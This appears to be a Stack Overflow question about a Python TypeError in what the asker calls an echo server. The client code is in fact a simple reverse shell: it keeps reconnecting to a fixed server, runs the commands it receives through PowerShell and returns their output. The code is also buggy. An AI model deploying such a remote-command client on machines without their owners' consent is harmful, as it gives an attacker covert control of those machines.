# Python3:socket:TypeError: unsupported operand type(s) for +=: 'type' and 'bytes'

Tags: python-3.x, sockets, serversocket

I am trying to use the python socket package to implement an echo server. But it continuously occurs the error: TypeError: unsupported operand type(s) for += 'type' and 'bytes', is there any errors in my code?
Can someone help me to fix it plsssss

here is the error:

```
C:\Users\mouad\AppData\Local\Programs\Python\Python310\python.exe "C:\Users\mouad\OneDrive\Bureau\Python Projects\Server Socket\server.py"
Waiting for connection .....
Client IP 192.168.1.12 : 56952
>> getmac
Traceback (most recent call last):
  File "C:\Users\mouad\OneDrive\Bureau\Python Projects\Server Socket\server.py", line 31, in <module>
    full_result += chunk
TypeError: unsupported operand type(s) for +=: 'type' and 'bytes'

Process finished with exit code 1
```

Here is my code:

server.py:

```
import socket

end_result = "<end_of_result>"
server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_connection = ("192.168.1.12", 2000)
print('Waiting for connection .....')
server_socket.bind(server_connection)
server_socket.listen(50)
server_socket, address_client = server_socket.accept()
print('Client IP', address_client[0], ":", address_client[1])


while True:
    command = input(">> ")
    server_socket.send(command.encode())
    if command.lower() == "stop":
        server_socket.close()
        break
    elif command == "":
        continue
    else:
        full_result = bytes
        while True:
            chunk = server_socket.recv(1024)
            if chunk.endswith(end_result.encode()):
                chunk = chunk[:-len(end_result)]
                full_result += chunk
                print(full_result.decode())
                break
            else:
                full_result += chunk
                #print(full_result.decode())
```

client.py:

```
import socket
import subprocess
import time

server_connection = ("192.168.1.12", 2000)
end_result = "<end_of_result>"
while True:
    try:
        client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        print('Connecting ...')
        client_socket.connect(server_connection)
        while True:
            command = client_socket.recv(1024)
            command = command.decode()
            if command.lower() == 'stop':
                client_socket.close()
                break
            elif command == '':
                continue
            else:
                output = subprocess.run(["powershell.exe", command], shell=True, capture_output=True)
                if output.stderr.decode("utf-8") == "":
                    result = output.stdout
                    result = result.decode("utf-8")+end_result
                    result = result.encode("utf-8")

                elif output.stderr.decode("utf-8") != "":
                    result = output.stderr
                    result = result.decode("utf-8")+end_result
                    result = result.encode("utf-8")
                client_socket.sendall(result.encode("utf-8"))

    except Exception:
        print('.')
        time.sleep(0.5)
        print('..')
        time.sleep(0.5)
        print('...')
        time.sleep(3)
        print("Can't connect ")
        time.sleep(0.5)
```

Comment: Hint: `full_result = bytes` is the problem.

Comment: and What should I do